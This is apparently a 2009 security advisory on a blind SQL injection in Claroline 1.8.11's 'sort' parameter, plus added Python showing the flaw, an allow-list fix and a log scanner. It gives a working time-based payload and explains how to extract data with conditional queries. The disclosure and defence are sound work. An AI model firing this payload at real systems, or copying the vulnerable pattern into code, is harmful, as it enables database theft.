Tuesday, May 12, 2009

Claroline v.1.8.11 SQL Injection

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: High

The 'sort' parameter from '/claroline/group/group.php' is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

For example, the request:
http://somehost/claroline/group/group.php?cidReq=TEST1&sort=IF(FALSE,1,SLEEP(10))&dir=3
will generate the following SQL query:
SELECT * FROM `c_TEST1_group_team` `g`

# retrieve the tutor id
LEFT JOIN `claroline_1_8_11`.`cl_user` AS `tutor`
ON `tutor`.`user_id` = `g`.`tutor`

# retrieve the user group(s)
LEFT JOIN `c_TEST1_group_rel_team_user` AS `ug`
ON `ug`.`team` = `g`.`id` AND `ug`.`user` = 0

# count the registered users in each group
LEFT JOIN `c_TEST1_group_rel_team_user` `ug2`
ON `ug2`.`team` = `g`.`id`

GROUP BY `g`.`id`
ORDER BY IF(FALSE,1,SLEEP(10)) DESC LIMIT 0, 20
This query will take about 10 seconds to execute. Replacing the FALSE element (in IF(FALSE,1,SLEEP(10))) with conditional queries can be used to extract arbitrary data from the database.
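The root cause described above is a sort key concatenated straight into ORDER BY. The following Python is an added illustration written for this post, not Claroline's own code: it places the raw-interpolation pattern beside an allow-list builder that maps request-side sort keys to fixed column expressions, and adds a small log scan that flags requests to group.php whose sort value is outside that allow-list. The column names, the dir-code mapping (the page only shows dir=3 producing DESC) and the access-log lines are all constructed assumptions.

```python
"""Allow-listed ORDER BY construction and a log check for out-of-list sort values.

Added example for the Claroline group.php advisory; not project code.
Column names, the 'dir' encoding and the sample log are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list: request-side sort key -> SQL column expression.
# The real column names used by Claroline's group listing are not on the page.
SORT_COLUMNS = {
    "name": "`g`.`name`",
    "tutor": "`tutor`.`lastname`",
    "members": "COUNT(`ug2`.`user`)",
}

# Constructed mapping for the 'dir' parameter; only dir=3 -> DESC is shown on the page.
DIRECTIONS = {"1": "ASC", "3": "DESC"}


def vulnerable_order_by(sort: str, direction: str) -> str:
    """The pattern the advisory describes: the sort value is reflected into SQL."""
    return f"ORDER BY {sort} {DIRECTIONS.get(direction, 'ASC')}"


def safe_order_by(sort: str, direction: str) -> str:
    """Resolve sort/dir through allow-lists; user input never reaches the SQL text.

    Unknown sort keys are rejected rather than silently defaulted, so probing
    produces an error that can be logged instead of a valid page.
    """
    try:
        column = SORT_COLUMNS[sort]
    except KeyError:
        raise ValueError(f"unknown sort key: {sort!r}") from None
    return f"ORDER BY {column} {DIRECTIONS.get(direction, 'ASC')}"


# Constructed Apache-style access log: two legitimate requests around the
# request shown in the advisory.
ACCESS_LOG = """\
203.0.113.7 - - [12/May/2009:10:01:02 +0000] "GET /claroline/group/group.php?cidReq=TEST1&sort=name&dir=1 HTTP/1.1" 200 5120
203.0.113.7 - - [12/May/2009:10:01:15 +0000] "GET /claroline/group/group.php?cidReq=TEST1&sort=IF(FALSE,1,SLEEP(10))&dir=3 HTTP/1.1" 200 5120
203.0.113.7 - - [12/May/2009:10:01:40 +0000] "GET /claroline/group/group.php?cidReq=TEST1&sort=tutor&dir=3 HTTP/1.1" 200 5120
"""

_REQUEST_RE = re.compile(r'"GET (\S+) HTTP/')


def find_unexpected_sort(log_text: str) -> list:
    """Return the sort values sent to group.php that are not in SORT_COLUMNS.

    Useful for retrospective hunting in web server logs: any value other
    than an allow-listed key is at minimum a tampering attempt.
    """
    hits = []
    for line in log_text.splitlines():
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group(1))
        if not parts.path.endswith("/group/group.php"):
            continue
        # parse_qs percent-decodes, so encoded payloads are normalised before the check.
        for value in parse_qs(parts.query).get("sort", []):
            if value not in SORT_COLUMNS:
                hits.append(value)
    return hits


if __name__ == "__main__":
    print(vulnerable_order_by("IF(FALSE,1,SLEEP(10))", "3"))
    print(safe_order_by("tutor", "3"))
    print(find_unexpected_sort(ACCESS_LOG))
```

The allow-list approach sidesteps escaping entirely: identifiers cannot be bound as prepared-statement parameters, so mapping a fixed set of keys to fixed column expressions is the standard fix for sort and order parameters.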

Status:
1. Contacted the author on May 07, 2009 via http://forum.claroline.net/.
2. The author fixed the problem; see: Re: Claroline v.1.8.11 SQL Injection
